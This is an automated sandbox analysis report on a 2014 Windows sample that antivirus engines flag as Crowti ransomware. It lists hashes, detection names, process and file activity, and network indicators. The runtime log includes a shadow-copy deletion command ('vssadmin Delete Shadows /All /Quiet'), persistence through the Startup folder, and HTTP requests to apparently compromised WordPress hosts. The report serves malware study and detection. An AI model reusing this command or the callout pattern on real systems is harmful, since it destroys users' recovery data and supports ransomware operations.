Analysis Date: 2014-11-12 20:12:45
MD5: b725067c7926e8a3268d2fabfcad7b4e
SHA1: 2518fb688bec920f49e6b20144dc385866a2a70c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text: md5: a6cd0acfe43ba0756e6a25d1eb8fab05, sha1: 1d89ee75317bbd507910f1448d944c76e46d9748, size: 8192
Section .rdata: md5: d336e67b05c618199caad64856573b49, sha1: 348f2b34d6358c425cc7006c53865ebdb2db5a9c, size: 4096
Section .data: md5: e90cd9e813543fe0bfb6270da6dfd981, sha1: 9ba5154e74b7579784b8c58aa7f06302c9c70065, size: 4096
Section .idata: md5: 5aa89d3972517cf4914e697ab1eecd49, sha1: 3e375cf2d561df36164fee6b7c3590173b19eac5, size: 4096
Section .rsrc: md5: caf32995903505655ba47fa081239fe5, sha1: 4090124105678256349179941d061e4c769e308e, size: 221184
Section .reloc: md5: 923ac526dc4dac739bd3c3f34ce85ab0, sha1: 40c6f4d626a232002e6697e148d45f22e26bc48e, size: 4096
Timestamp: 2014-10-28 16:24:34
Version:
LegalCopyright: Copyright ? 2014
InternalName: tool
FileVersion: 1, 0, 0, 1
CompanyName:
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: tool
SpecialBuild:
ProductVersion: 1, 0, 0, 1
FileDescription: tool
OriginalFilename: tool.exe
Packer: Microsoft Visual C++ v6.0
PEhash: 036556770c528e4aca87dffdf88785407d1a521d
IMPhash: ee33aa2c30b8b2f66b18329f6ef938ed
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.GenericKD.1963064
AV Alwil (avast): no_virus
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Trojan.EOCS-3091
AV Avira (antivir): TR/Crowti.A.154
AV BullGuard: Trojan.GenericKD.1963064
AV CA (E-Trust Ino): Win32/Tnega.bXFbGE
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.Win32.FileCoder
AV Eset (nod32): Win32/Filecoder.CO
AV Fortinet: no_virus
AV Frisk (f-prot): W32/Trojan3.LYZ
AV F-Secure: no_virus
AV Grisoft (avg): Generic_r.EGM
AV Ikarus: Win32.Outbreak
AV K7: Trojan ( 00498ab51 )
AV Kaspersky: Trojan-Dropper.Win32.Injector.kvtm
AV MalwareBytes: Trojan.Agent.ED
AV Mcafee: RDN/Ransom!el
AV Microsoft Security Essentials: Ransom:Win32/Crowti.A
AV MicroWorld (escan): no_virus
AV Norman: Trojan.GenericKD.1963064
AV Rising: no_virus
AV Sophos: Troj/Mdrop-GIX
AV Symantec: no_virus
AV Trend Micro: TROJ_RANSOM.YMKB
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\a1a0cab\a1a0cab.exe
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\a1a0cab.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\a1a0cab.exe
Creates Process: -k netsvcs
Creates Process: vssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: designbytheme.com
Winsock DNS: blog.marianisel.com
Winsock DNS: freekidsvideos.net
Winsock DNS: virachey.com
Winsock DNS: bball-keyman.net
Winsock DNS: stpaulmaybee.org
Winsock DNS: www.grekiskaforeningen.com
Winsock DNS: bethpeters.net
Winsock DNS: danielferris.com.au
Winsock DNS: clerktogovernors.co.uk

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: virachey.com
Type: A
198.23.48.160
DNS: blog.marianisel.com
Type: A
70.167.156.65
DNS: stpaulmaybee.org
Type: A
198.23.48.88
DNS: bethpeters.net
Type: A
184.154.193.178
DNS: clerktogovernors.co.uk
Type: A
94.136.40.103
DNS: freekidsvideos.net
Type: A
192.252.214.226
DNS: designbytheme.com
Type: A
174.136.39.160
DNS: www.grekiskaforeningen.com
Type: A
193.12.177.238
DNS: bball-keyman.net
Type: A
203.189.105.172
DNS: danielferris.com.au
Type: A
117.55.227.125
HTTP GET: http://virachey.com/wp-content/themes/lightweight/bw69t
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://blog.marianisel.com/wp-content/themes/lightweight/350g8t4.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://stpaulmaybee.org/wp-content/themes/lightweight/oc3da
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://bethpeters.net/wp-content/themes/lightweight/ktw4x2i.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://clerktogovernors.co.uk//wp-content/themes/lightweight/9mlmkmsyxyur
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://freekidsvideos.net/wp-content/themes/lightweight/whf3yq4n86qe3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://designbytheme.com/wp-content/themes/lightweight/29uts5hztr5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.grekiskaforeningen.com/wp-content/themes/jarrah/3yjkvdut.bin
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://bball-keyman.net/wp-content/themes/classic/g43zn76n01ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://danielferris.com.au/wp-content/themes/lightweight/hlka9j81f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 198.23.48.160:80
Flows TCP: 192.168.1.1:1032 ➝ 70.167.156.65:80
Flows TCP: 192.168.1.1:1033 ➝ 198.23.48.88:80
Flows TCP: 192.168.1.1:1034 ➝ 184.154.193.178:80
Flows TCP: 192.168.1.1:1035 ➝ 94.136.40.103:80
Flows TCP: 192.168.1.1:1036 ➝ 192.252.214.226:80
Flows TCP: 192.168.1.1:1037 ➝ 174.136.39.160:80
Flows TCP: 192.168.1.1:1038 ➝ 193.12.177.238:80
Flows TCP: 192.168.1.1:1039 ➝ 203.189.105.172:80
Flows TCP: 192.168.1.1:1040 ➝ 117.55.227.125:80

Raw Pcap

Strings